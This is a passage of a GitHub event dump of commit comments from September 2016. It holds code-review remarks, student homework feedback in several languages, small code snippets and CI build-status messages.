no\r\nevery bash script can work on zenfone 2\r\nin this this script there is a line that shows it completelly belongs to u?\r\nno\r\nu still trying take credit from cherry-picked commit \r\n"}},"created_at":"2016-09-15T09:28:53Z"}
{"id":"4567008062","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19032941,"position":null,"line":null,"path":null,"commit_id":"5989da3d46dab497a2ec03ef6c9c42dc25f0b612","created_at":"2016-09-15T09:29:34Z","updated_at":"2016-09-15T09:29:34Z","body":"Lol fair enough!\n\nSo about the charger issue.  It looks as though, once the charge reaches\n100 percent, the driver sets a 40 minute duration of \"trickle charge,\" and\nthen is supposed to stop (but will probably keep coming back on when drain\nstarts again).  So I'm gonna see what I can do, though it may be tricky.\nI've been looking at it though!\n\nOn Thu, Sep 15, 2016 at 2:51 AM, Andycar <notifications@github.com> wrote:\n\n> I would be glad to teach, but I'm not a programmer in any way :)\n> Just working in some Samsung department.\n> Some other programmer has shown me how to cherry-pick the other day - I\n> didn't understand a single word :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/robcore/machinex/commit/5989da3d46dab497a2ec03ef6c9c42dc25f0b612#commitcomment-19032552>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACjHoG-0Uyf9MO7E3zKQnEOmVor-lrluks5qqQcvgaJpZM4J9lR8>\n> .\n>\n"}},"created_at":"2016-09-15T09:29:34Z"}
{"id":"4567008607","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19032943,"position":26,"line":25,"path":"challenge_6/App/lib/lib.my_app.rb","commit_id":"182d4bacb834b419c79e24d8d42e71116efea63d","created_at":"2016-09-15T09:29:41Z","updated_at":"2016-09-15T09:29:41Z","body":"1. The file name is not correct. `lib.my_app.rb` \r\n2. This is what we are looking for, i.e.:\r\n```\r\ncountry_1 = {country: 'Sweden', capital: 'Stockholm}\r\ncountry_2 = {country: 'Poland', capital: 'Warsaw}\r\ncountry_1 = {country: 'South Africa', capital: 'Pretoria}\r\n@countries = [country_1, country_2, country_3]\r\n```\r\nIf `@countries` is defined in your controller then you can iterate over it in your view."}},"created_at":"2016-09-15T09:29:41Z"}
{"id":"4567009350","type":"CommitCommentEvent","actor":{"login":"mbernasocchi"},"repo":{"name":"opengisch/QField"},"payload":{"comment":{"id":19032944,"position":null,"line":null,"path":null,"commit_id":"63c71519f872fdcd5b668f3e551d82bb0cdb9907","created_at":"2016-09-15T09:29:50Z","updated_at":"2016-09-15T09:29:50Z","body":"I know. I didn't think you already made a commit inbetween :)\n\nOn 15 September 2016 11:20:37 CEST, Matthias Kuhn <notifications@github.com> wrote:\n>    git pull --rebase # is your friend\n>\n>;)\n>\n>-- \n>You are receiving this because you authored the thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/opengisch/QField/commit/63c71519f872fdcd5b668f3e551d82bb0cdb9907#commitcomment-19032847\n\n-- \nMarco Bernasocchi (mobile).\nOPENGIS.ch - berna.io - 27summits.ch"}},"created_at":"2016-09-15T09:29:50Z"}
{"id":"4567010227","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19032945,"position":null,"line":null,"path":null,"commit_id":"060e26f1fec9b06ec63219edd87fe2d181f10003","created_at":"2016-09-15T09:30:02Z","updated_at":"2016-09-15T09:30:02Z","body":"I checked that it does run and pass the XML parsing. I didn't check how it renders in every man page. The three I looked at seemed OK."}},"created_at":"2016-09-15T09:30:02Z"}
{"id":"4567013560","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19032950,"position":null,"line":null,"path":null,"commit_id":"aa86de012e655ea948e9cae4473b2b031db13ff9","created_at":"2016-09-15T09:30:44Z","updated_at":"2016-09-15T09:30:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1005](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13302&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T09:30:44Z"}
{"id":"4567013982","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19032951,"position":null,"line":null,"path":null,"commit_id":"e09c2b77efe78d43c50616a5083c0abcc5fd441f","created_at":"2016-09-15T09:30:49Z","updated_at":"2016-09-15T09:30:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1006](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13303&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T09:30:49Z"}
{"id":"4567026107","type":"CommitCommentEvent","actor":{"login":"fernandog"},"repo":{"name":"pymedusa/SickRage"},"payload":{"comment":{"id":19032981,"position":12,"line":39,"path":"sickbeard/showUpdater.py","commit_id":"8964f582b71af9034b37732e6f964914b1a28301","created_at":"2016-09-15T09:33:31Z","updated_at":"2016-09-15T09:33:31Z","body":"And this force?"}},"created_at":"2016-09-15T09:33:31Z"}
{"id":"4567028518","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19032985,"position":null,"line":null,"path":null,"commit_id":"e0c4de27d031b970cf653951ddd78f23cd3fa509","created_at":"2016-09-15T09:34:02Z","updated_at":"2016-09-15T09:34:02Z","body":"@dktapps Incoming repeater and conductor!"}},"created_at":"2016-09-15T09:34:02Z"}
{"id":"4567031264","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19032988,"position":342,"line":342,"path":"CampChallenge_PHP/003.プログラミング基礎学習３/kiso_03.php","commit_id":"c5bcad56558a312cf886388363ec0ef322eab99d","created_at":"2016-09-15T09:34:39Z","updated_at":"2016-09-15T09:34:39Z","body":"添田です。\r\nこの課題でやって欲しい事ですが、とある関数を用意して、その関数には3人分の情報が入った配列と検索文字列を渡してください。イメージ⇒AAA(3人分の情報が入った配列, 検索文字列)"}},"created_at":"2016-09-15T09:34:39Z"}
{"id":"4567033396","type":"CommitCommentEvent","actor":{"login":"herkulano"},"repo":{"name":"angular/material2"},"payload":{"comment":{"id":19032991,"position":127,"line":38,"path":"GETTING_STARTED.md","commit_id":"8eca40b069dc7b72654cd5d375d86db1e4f792e2","created_at":"2016-09-15T09:35:06Z","updated_at":"2016-09-15T09:35:06Z","body":"There's conflicting information in the changelog: https://github.com/angular/material2/blob/master/CHANGELOG.md\r\n\r\nWhich one is correct?\r\n```js\r\n@NgModule({\r\n    imports: [\r\n        MdCoreModule.forRoot(),\r\n        MdRadioModule.forRoot(),\r\n        MdIconModule.forRoot()\r\n    ]\r\n...\r\n});\r\n```\r\n"}},"created_at":"2016-09-15T09:35:06Z"}
{"id":"4567036564","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19033001,"position":406,"line":406,"path":"CampChallenge_PHP/003.プログラミング基礎学習３/kiso_03.php","commit_id":"c5bcad56558a312cf886388363ec0ef322eab99d","created_at":"2016-09-15T09:35:49Z","updated_at":"2016-09-15T09:35:49Z","body":"添田です。\r\nその認識は正しいです。関数名が同じものは複数宣言できません。"}},"created_at":"2016-09-15T09:35:49Z"}
{"id":"4567039619","type":"CommitCommentEvent","actor":{"login":"dschwank"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19033008,"position":66,"line":159,"path":"config/webpack.common.js","commit_id":"dd1276b4989319a66e189ee78b87dc86a3a451a1","created_at":"2016-09-15T09:36:29Z","updated_at":"2016-09-15T09:36:29Z","body":"I was not able to get this work with SCSS files. I had to remove this section and replace it with the stuff documented in the WIKI page [How to include SCSS in components](https://github.com/AngularClass/angular2-webpack-starter/wiki/How-to-include-SCSS-in-components).\r\n\r\n```\r\n{\r\n  test: /\\.scss$/,\r\n  exclude: /node_modules/,\r\n  loaders: ['raw-loader', 'sass-loader'] // sass-loader not scss-loader\r\n}\r\n```\r\nCan you give some more information?!\r\n\r\nGreetings"}},"created_at":"2016-09-15T09:36:29Z"}
{"id":"4567039653","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033009,"position":null,"line":null,"path":null,"commit_id":"29a892f6a28a759dd30037b1b0c91b921ca86b25","created_at":"2016-09-15T09:36:30Z","updated_at":"2016-09-15T09:36:30Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 27](http://munit-050:8112/tc/viewLog.html?buildId=99039&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T09:36:30Z"}
{"id":"4567040667","type":"CommitCommentEvent","actor":{"login":"duncanspumpkin"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19033010,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T09:36:43Z","updated_at":"2016-09-15T09:36:43Z","body":"Well it should all be reworked so that this is the number of free misc sprites"}},"created_at":"2016-09-15T09:36:43Z"}
{"id":"4567044976","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Tactless7/defi_rechercheweb"},"payload":{"comment":{"id":19033018,"position":null,"line":null,"path":null,"commit_id":"5be9153b2314cfd7232760168cb00cab380ade13","created_at":"2016-09-15T09:37:40Z","updated_at":"2016-09-15T09:37:40Z","body":"Comme tu le dis, La cantine n'est pas une communauté mais un espace numérique.\r\nLes communautés ont créés des groupes sur meetup.com pour faciliter leur organisation. Quels sont ces groupes ?"}},"created_at":"2016-09-15T09:37:40Z"}
{"id":"4567045958","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19033019,"position":null,"line":null,"path":null,"commit_id":"709b4e5758e997f888e5c0356e46640cdd5a4388","created_at":"2016-09-15T09:37:54Z","updated_at":"2016-09-15T09:37:54Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3937\n"}},"created_at":"2016-09-15T09:37:54Z"}
{"id":"4567047759","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Tactless7/defi_rechercheweb"},"payload":{"comment":{"id":19033023,"position":null,"line":null,"path":null,"commit_id":"ed4485e7b661e284614c86573351d927ac1d81e7","created_at":"2016-09-15T09:38:21Z","updated_at":"2016-09-15T09:38:21Z","body":"Et à l'IOT Valley que se passe-t-il ?\r\n"}},"created_at":"2016-09-15T09:38:21Z"}
{"id":"4567050076","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Tactless7/defi_rechercheweb"},"payload":{"comment":{"id":19033024,"position":null,"line":null,"path":null,"commit_id":"756bf4fe8ca7ff88f5e4ce655145678be6b81bb6","created_at":"2016-09-15T09:38:51Z","updated_at":"2016-09-15T09:38:51Z","body":"A quel âge s'est-il suicidé ?"}},"created_at":"2016-09-15T09:38:51Z"}
{"id":"4567050475","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033025,"position":3,"line":3,"path":"README.md","commit_id":"545d9c42626f2ffc599e9df11d1c722110dc7b50","created_at":"2016-09-15T09:38:56Z","updated_at":"2016-09-15T09:38:56Z","body":"Est-ce que tu as compris le copier coller que ta fait ? Pourrais-tu le refaire avec t'es propres mots ? "}},"created_at":"2016-09-15T09:38:56Z"}
{"id":"4567053992","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Tactless7/defi_rechercheweb"},"payload":{"comment":{"id":19033030,"position":null,"line":null,"path":null,"commit_id":"6866134e1ad2e9aa19edaffbef8867cfe3fedd9c","created_at":"2016-09-15T09:39:45Z","updated_at":"2016-09-15T09:39:45Z","body":"PLus grande liberté ? pas sûr"}},"created_at":"2016-09-15T09:39:45Z"}
{"id":"4567056110","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19033037,"position":29,"line":175,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"9f4653f1938ee5578be91d4a02bdd8c95bbc2b9e","created_at":"2016-09-15T09:40:14Z","updated_at":"2016-09-15T09:40:14Z","body":"use here get-mssqlversion and send it to all the methods required to know it"}},"created_at":"2016-09-15T09:40:14Z"}
{"id":"4567057297","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Tactless7/defi_rechercheweb"},"payload":{"comment":{"id":19033041,"position":null,"line":null,"path":null,"commit_id":"93d31d1c69808a9d0884a7c4e87d0a07ddc64d3a","created_at":"2016-09-15T09:40:29Z","updated_at":"2016-09-15T09:40:29Z","body":"cryptés est un néologisme. Chiffré sera préféré."}},"created_at":"2016-09-15T09:40:29Z"}
{"id":"4567059055","type":"CommitCommentEvent","actor":{"login":"subratpanda1"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19033045,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-15T09:40:49Z","updated_at":"2016-09-15T09:40:49Z","body":"Could not solve. I reverted back to 0.32.0."}},"created_at":"2016-09-15T09:40:49Z"}
{"id":"4567060707","type":"CommitCommentEvent","actor":{"login":"fabianmoronzirfas"},"repo":{"name":"basiljs/basil.js"},"payload":{"comment":{"id":19033049,"position":null,"line":null,"path":null,"commit_id":"a7625d71e7b981aac08bbe342ced8ca4a6318eb0","created_at":"2016-09-15T09:41:12Z","updated_at":"2016-09-15T09:41:12Z","body":"This is still work in progress. Not ready for merging"}},"created_at":"2016-09-15T09:41:12Z"}
{"id":"4567060769","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033050,"position":5,"line":5,"path":"README.md","commit_id":"545d9c42626f2ffc599e9df11d1c722110dc7b50","created_at":"2016-09-15T09:41:13Z","updated_at":"2016-09-15T09:41:13Z","body":"Une seule source ! essaye d'avoir le plus de source possible afin confirmer ce que tu as écrits. minimum 2 sources ou +"}},"created_at":"2016-09-15T09:41:13Z"}
{"id":"4567061580","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19033051,"position":29,"line":175,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"9f4653f1938ee5578be91d4a02bdd8c95bbc2b9e","created_at":"2016-09-15T09:41:23Z","updated_at":"2016-09-15T09:41:23Z","body":"in this case, get-mssqllogfile and get-mssqlparameters"}},"created_at":"2016-09-15T09:41:23Z"}
{"id":"4567062293","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19033053,"position":null,"line":null,"path":null,"commit_id":"402bb47126391571944bcf3209365feac99d54a6","created_at":"2016-09-15T09:41:33Z","updated_at":"2016-09-15T09:41:33Z","body":"Using lsb() will be slow, all the more so on 32-bits machines.\r\n\r\nI suggest to use the following, which is faster (even on 64 bits systems, I tested it):\r\n\r\n````\r\nBitboard Position::slider_blockers(Bitboard sliders, Square s, Bitboard& pinners) const {\r\n\r\n  Bitboard result = 0;\r\n  pinners = 0;\r\n  Bitboard defensive = pieces(color_of(piece_on(s)));\r\n\r\n  // Snipers are sliders that attack 's' when a piece is removed\r\n  Bitboard snipers = (  (PseudoAttacks[ROOK  ][s] & pieces(QUEEN, ROOK))\r\n                 | (PseudoAttacks[BISHOP][s] & pieces(QUEEN, BISHOP))) & sliders;\r\n\r\n  while (snipers)\r\n  {\r\n       Square sniperSquare = pop_lsb(&snipers);\r\n       Bitboard b = between_bb(s, sniperSquare) & pieces();\r\n       if (!more_than_one(b))\r\n       {\r\n           result |= b;\r\n           \r\n           if (b & defensive)\r\n              pinners |= sniperSquare;\r\n       }\r\n  }\r\n  return result;\r\n}\r\n````"}},"created_at":"2016-09-15T09:41:33Z"}
{"id":"4567062483","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19033054,"position":null,"line":null,"path":null,"commit_id":"b3cdd00f1c9a36eb9b29c4db16361e3f7c01659f","created_at":"2016-09-15T09:41:35Z","updated_at":"2016-09-15T09:41:35Z","body":"Must be done for all array ;)"}},"created_at":"2016-09-15T09:41:35Z"}
{"id":"4567063814","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RudySIMPLON/d-fi-recherche"},"payload":{"comment":{"id":19033055,"position":null,"line":null,"path":null,"commit_id":"6fea1faac5e5ac9e1faa4357f72b749bd7933eff","created_at":"2016-09-15T09:41:52Z","updated_at":"2016-09-15T09:41:52Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:41:52Z"}
{"id":"4567065250","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RudySIMPLON/d-fi-recherche"},"payload":{"comment":{"id":19033058,"position":null,"line":null,"path":null,"commit_id":"e298307d21248df4a03aa8fe216288e6088986ec","created_at":"2016-09-15T09:42:12Z","updated_at":"2016-09-15T09:42:12Z","body":"Source monip.com ? J'en doute."}},"created_at":"2016-09-15T09:42:12Z"}
{"id":"4567065460","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RudySIMPLON/d-fi-recherche"},"payload":{"comment":{"id":19033059,"position":null,"line":null,"path":null,"commit_id":"e298307d21248df4a03aa8fe216288e6088986ec","created_at":"2016-09-15T09:42:14Z","updated_at":"2016-09-15T09:42:14Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:42:14Z"}
{"id":"4567065959","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19033060,"position":null,"line":null,"path":null,"commit_id":"aa86de012e655ea948e9cae4473b2b031db13ff9","created_at":"2016-09-15T09:42:20Z","updated_at":"2016-09-15T09:42:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1005](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13302&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:35"}},"created_at":"2016-09-15T09:42:20Z"}
{"id":"4567066466","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19033061,"position":null,"line":null,"path":null,"commit_id":"e09c2b77efe78d43c50616a5083c0abcc5fd441f","created_at":"2016-09-15T09:42:26Z","updated_at":"2016-09-15T09:42:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1006](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13303&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:36"}},"created_at":"2016-09-15T09:42:26Z"}
{"id":"4567067947","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RudySIMPLON/d-fi-recherche"},"payload":{"comment":{"id":19033073,"position":null,"line":null,"path":null,"commit_id":"f2ffc11b1e9bf686aa36525a7ec2f729235da9ee","created_at":"2016-09-15T09:42:44Z","updated_at":"2016-09-15T09:42:44Z","body":"Tu ne dis pas comment ils fonctionnent.\r\nCOmment fonctionnennet-ils ?\r\n"}},"created_at":"2016-09-15T09:42:44Z"}
{"id":"4567068120","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RudySIMPLON/d-fi-recherche"},"payload":{"comment":{"id":19033074,"position":null,"line":null,"path":null,"commit_id":"f2ffc11b1e9bf686aa36525a7ec2f729235da9ee","created_at":"2016-09-15T09:42:46Z","updated_at":"2016-09-15T09:42:46Z","body":"\r\nMessage de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:42:46Z"}
{"id":"4567070747","type":"CommitCommentEvent","actor":{"login":"ratoaq2"},"repo":{"name":"pymedusa/SickRage"},"payload":{"comment":{"id":19033082,"position":12,"line":39,"path":"sickbeard/showUpdater.py","commit_id":"8964f582b71af9034b37732e6f964914b1a28301","created_at":"2016-09-15T09:43:20Z","updated_at":"2016-09-15T09:43:20Z","body":"I can't remove it because scheduler expects exactly this method signature from the actions:\r\n\r\nhttps://github.com/pymedusa/SickRage/blob/bugfix/show-refresh/sickbeard/scheduler.py#L106"}},"created_at":"2016-09-15T09:43:20Z"}
{"id":"4567071295","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19033085,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T09:43:26Z","updated_at":"2016-09-15T09:43:26Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T09:43:26Z"}
{"id":"4567071457","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033086,"position":9,"line":9,"path":"README.md","commit_id":"545d9c42626f2ffc599e9df11d1c722110dc7b50","created_at":"2016-09-15T09:43:28Z","updated_at":"2016-09-15T09:43:28Z","body":"Copier coller ! Essaye de faire des phrases avec t'es propres mots"}},"created_at":"2016-09-15T09:43:28Z"}
{"id":"4567072301","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033091,"position":null,"line":null,"path":null,"commit_id":"c946473f8660de09cdda9a789efbc987dfa6ef16","created_at":"2016-09-15T09:43:39Z","updated_at":"2016-09-15T09:43:39Z","body":"\r\nMessage de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:43:39Z"}
{"id":"4567073094","type":"CommitCommentEvent","actor":{"login":"sn6uv"},"repo":{"name":"sn6uv/Mathics"},"payload":{"comment":{"id":19033093,"position":9,"line":0,"path":"mathics/builtin/compile/ir.py","commit_id":"8d7d1d8f2f8ff644e4abbbc9fdfa891501ecf8a7","created_at":"2016-09-15T09:43:49Z","updated_at":"2016-09-15T09:43:49Z","body":"should be if exponent.type == int_type"}},"created_at":"2016-09-15T09:43:49Z"}
{"id":"4567074616","type":"CommitCommentEvent","actor":{"login":"edgarriba"},"repo":{"name":"openMVG/openMVG"},"payload":{"comment":{"id":19033100,"position":25,"line":36,"path":".travis.yml","commit_id":"a761cfec70c907d9d159fe34323ee298f2abd03c","created_at":"2016-09-15T09:44:07Z","updated_at":"2016-09-15T09:44:07Z","body":"@pmoulon\r\nAre this lines of code working in your project? I saw in a later commit you get rid of them.\r\nI'm trying to include coveralls in in tiny-dnn but no luck at least in the PR\r\nhttps://github.com/tiny-dnn/tiny-dnn/pull/306/files"}},"created_at":"2016-09-15T09:44:07Z"}
{"id":"4567076096","type":"CommitCommentEvent","actor":{"login":"sn6uv"},"repo":{"name":"sn6uv/Mathics"},"payload":{"comment":{"id":19033104,"position":16,"line":0,"path":"mathics/builtin/compile/ir.py","commit_id":"8d7d1d8f2f8ff644e4abbbc9fdfa891501ecf8a7","created_at":"2016-09-15T09:44:26Z","updated_at":"2016-09-15T09:44:26Z","body":"needs void check"}},"created_at":"2016-09-15T09:44:26Z"}
{"id":"4567078174","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033105,"position":null,"line":null,"path":null,"commit_id":"c946473f8660de09cdda9a789efbc987dfa6ef16","created_at":"2016-09-15T09:44:54Z","updated_at":"2016-09-15T09:44:54Z","body":"Comment Aaron meurt ?\r\nCa sent le copier coller ! Récrit le avec ce que tu en as compris."}},"created_at":"2016-09-15T09:44:54Z"}
{"id":"4567079378","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033106,"position":null,"line":null,"path":null,"commit_id":"c946473f8660de09cdda9a789efbc987dfa6ef16","created_at":"2016-09-15T09:45:12Z","updated_at":"2016-09-15T09:45:12Z","body":"GNU: copier coller ?\r\n"}},"created_at":"2016-09-15T09:45:12Z"}
{"id":"4567080698","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19033109,"position":24,"line":24,"path":"src/pocketmine/block/Attachable.php","commit_id":"aa696c57fbf501de4f92a010bcb929254e7c595f","created_at":"2016-09-15T09:45:28Z","updated_at":"2016-09-15T09:45:28Z","body":"Heh, it was just such a good idea, wasn't it? :D"}},"created_at":"2016-09-15T09:45:28Z"}
{"id":"4567081705","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033111,"position":null,"line":null,"path":null,"commit_id":"c946473f8660de09cdda9a789efbc987dfa6ef16","created_at":"2016-09-15T09:45:40Z","updated_at":"2016-09-15T09:45:40Z","body":"Https : cryptage n'est pas français. Préféré chiffrage."}},"created_at":"2016-09-15T09:45:40Z"}
{"id":"4567081812","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19033112,"position":null,"line":null,"path":null,"commit_id":"a307516871d856e02ccd4f17957a9f7013995d77","created_at":"2016-09-15T09:45:41Z","updated_at":"2016-09-15T09:45:41Z","body":"TeamCity test :: test [Build 12](http://ci.lemmew.com:8111/viewLog.html?buildId=1464&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-15T09:45:41Z"}
{"id":"4567082026","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19033114,"position":null,"line":null,"path":null,"commit_id":"a307516871d856e02ccd4f17957a9f7013995d77","created_at":"2016-09-15T09:45:44Z","updated_at":"2016-09-15T09:45:44Z","body":"TeamCity test :: test [Build 12](http://ci.lemmew.com:8111/viewLog.html?buildId=1464&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:02"}},"created_at":"2016-09-15T09:45:44Z"}
{"id":"4567082339","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19033115,"position":24,"line":24,"path":"src/pocketmine/block/Attachable.php","commit_id":"aa696c57fbf501de4f92a010bcb929254e7c595f","created_at":"2016-09-15T09:45:48Z","updated_at":"2016-09-15T09:45:48Z","body":"I don't know why nobody ever thought of it before"}},"created_at":"2016-09-15T09:45:48Z"}
{"id":"4567082758","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033116,"position":null,"line":null,"path":null,"commit_id":"c946473f8660de09cdda9a789efbc987dfa6ef16","created_at":"2016-09-15T09:45:53Z","updated_at":"2016-09-15T09:45:53Z","body":"Une réponse == un commit.\r\nOn ne s'y retrouve pas !"}},"created_at":"2016-09-15T09:45:53Z"}
{"id":"4567082868","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033117,"position":7,"line":7,"path":"README.md","commit_id":"545d9c42626f2ffc599e9df11d1c722110dc7b50","created_at":"2016-09-15T09:45:55Z","updated_at":"2016-09-15T09:45:55Z","body":"Tu as mis plusieurs sources, dommages que tu n'as pas fait les réponses de toi-même."}},"created_at":"2016-09-15T09:45:55Z"}
{"id":"4567084905","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033119,"position":null,"line":null,"path":null,"commit_id":"dbede864475ce88810af03f4fa9556f396fb10a8","created_at":"2016-09-15T09:46:21Z","updated_at":"2016-09-15T09:46:21Z","body":"\r\nMessage de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:46:21Z"}
